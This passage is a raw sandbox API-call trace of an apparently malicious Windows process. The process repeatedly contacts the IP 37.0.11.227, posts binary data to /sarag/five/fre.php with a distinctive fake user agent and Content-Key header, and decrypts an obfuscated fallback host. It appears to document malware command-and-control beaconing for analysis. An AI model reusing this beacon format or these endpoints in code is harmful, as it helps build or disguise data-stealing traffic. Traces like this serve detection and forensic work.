(HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0311.835] socket (af=2, type=1, protocol=6) returned 0xa84 [0311.836] connect (s=0xa84, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0311.858] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0311.858] GetProcessHeap () returned 0x690000 [0311.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0311.858] GetProcessHeap () returned 0x690000 [0311.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0311.859] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.859] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.859] GetProcessHeap () returned 0x690000 [0311.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0311.859] GetProcessHeap () returned 0x690000 [0311.860] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.860] GetProcessHeap () returned 0x690000 [0311.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0311.860] GetProcessHeap () returned 0x690000 [0311.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0311.861] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.862] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.862] GetProcessHeap () returned 0x690000 [0311.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0311.862] GetProcessHeap () returned 0x690000 [0311.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.862] send (s=0xa84, buf=0x6ad508*, len=242, flags=0) returned 242 [0311.863] send (s=0xa84, buf=0x6aba40*, len=159, flags=0) returned 159 [0311.863] GetProcessHeap () returned 0x690000 [0311.863] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0311.863] recv (in: s=0xa84, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0311.940] GetProcessHeap () returned 0x690000 [0311.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0311.941] GetProcessHeap () returned 0x690000 [0311.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0311.941] GetProcessHeap () returned 0x690000 [0311.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0311.941] GetProcessHeap () returned 0x690000 [0311.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0311.942] closesocket (s=0xa84) returned 0 [0311.943] GetProcessHeap () returned 0x690000 [0311.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0311.943] GetProcessHeap () returned 0x690000 [0311.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.943] GetProcessHeap () returned 0x690000 [0311.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0311.944] GetProcessHeap () returned 0x690000 [0311.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0311.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16a0) returned 0xa84 [0311.945] Sleep (dwMilliseconds=0xea60) [0311.947] GetProcessHeap () returned 0x690000 [0311.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0311.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.948] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0311.959] GetProcessHeap () returned 0x690000 [0311.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0311.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.960] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0311.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.961] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.961] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.961] GetProcessHeap () returned 0x690000 [0311.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0311.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.963] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0311.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.964] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0311.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.965] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0311.965] GetProcessHeap () returned 0x690000 [0311.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.966] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.966] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.967] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.974] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.974] GetProcessHeap () returned 0x690000 [0311.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0311.974] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.975] GetProcessHeap () returned 0x690000 [0311.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0311.976] GetProcessHeap () returned 0x690000 [0311.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.976] GetProcessHeap () returned 0x690000 [0311.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0311.977] GetProcessHeap () returned 0x690000 [0311.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0311.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.978] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.984] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0311.989] GetProcessHeap () returned 0x690000 [0311.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0311.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.994] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0311.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.994] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.995] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.995] GetProcessHeap () returned 0x690000 [0311.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0311.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.997] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0311.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.998] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0311.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.998] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0311.998] GetProcessHeap () returned 0x690000 [0311.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.999] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0312.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.000] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0312.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.001] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0312.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.002] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0312.002] GetProcessHeap () returned 0x690000 [0312.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0312.002] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0312.002] GetProcessHeap () returned 0x690000 [0312.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0312.002] socket (af=2, type=1, protocol=6) returned 0xa88 [0312.002] connect (s=0xa88, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0312.026] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0312.026] GetProcessHeap () returned 0x690000 [0312.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0312.026] GetProcessHeap () returned 0x690000 [0312.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0312.027] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.028] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0312.028] GetProcessHeap () returned 0x690000 [0312.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0312.028] GetProcessHeap () returned 0x690000 [0312.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.029] GetProcessHeap () returned 0x690000 [0312.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0312.029] GetProcessHeap () returned 0x690000 [0312.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0312.029] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.030] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.030] GetProcessHeap () returned 0x690000 [0312.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0312.030] GetProcessHeap () returned 0x690000 [0312.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.031] send (s=0xa88, buf=0x6ad508*, len=242, flags=0) returned 242 [0312.031] send (s=0xa88, buf=0x6aba40*, len=159, flags=0) returned 159 [0312.031] GetProcessHeap () returned 0x690000 [0312.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0312.031] recv (in: s=0xa88, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0312.103] GetProcessHeap () returned 0x690000 [0312.104] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0312.104] GetProcessHeap () returned 0x690000 [0312.104] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0312.104] GetProcessHeap () returned 0x690000 [0312.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0312.105] GetProcessHeap () returned 0x690000 [0312.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0312.105] closesocket (s=0xa88) returned 0 [0312.105] GetProcessHeap () returned 0x690000 [0312.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0312.105] GetProcessHeap () returned 0x690000 [0312.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0312.107] GetProcessHeap () returned 0x690000 [0312.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0312.107] GetProcessHeap () returned 0x690000 [0312.108] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0312.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17c0) returned 0xa88 [0312.109] Sleep (dwMilliseconds=0xea60) [0312.111] GetProcessHeap () returned 0x690000 [0312.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0312.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.116] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0312.121] GetProcessHeap () returned 0x690000 [0312.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0312.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.121] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0312.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.122] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.123] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.123] GetProcessHeap () returned 0x690000 [0312.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0312.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.124] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0312.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.125] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0312.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.126] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0312.126] GetProcessHeap () returned 0x690000 [0312.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0312.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.127] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.127] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.128] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.130] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.130] GetProcessHeap () returned 0x690000 [0312.130] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0312.130] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.130] GetProcessHeap () returned 0x690000 [0312.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0312.131] GetProcessHeap () returned 0x690000 [0312.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0312.131] GetProcessHeap () returned 0x690000 [0312.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0312.132] GetProcessHeap () returned 0x690000 [0312.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0312.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.132] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.136] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0312.141] GetProcessHeap () returned 0x690000 [0312.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0312.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.142] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0312.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.143] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.143] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.143] GetProcessHeap () returned 0x690000 [0312.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0312.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.145] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0312.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.145] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0312.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.146] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0312.146] GetProcessHeap () returned 0x690000 [0312.146] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0312.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.147] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0312.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.148] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0312.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.149] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0312.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.150] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0312.150] GetProcessHeap () returned 0x690000 [0312.150] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0312.150] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0312.150] GetProcessHeap () returned 0x690000 [0312.150] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0312.150] socket (af=2, type=1, protocol=6) returned 0xa8c [0312.150] connect (s=0xa8c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0312.172] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0312.172] GetProcessHeap () returned 0x690000 [0312.172] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0312.173] GetProcessHeap () returned 0x690000 [0312.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0312.173] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.174] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 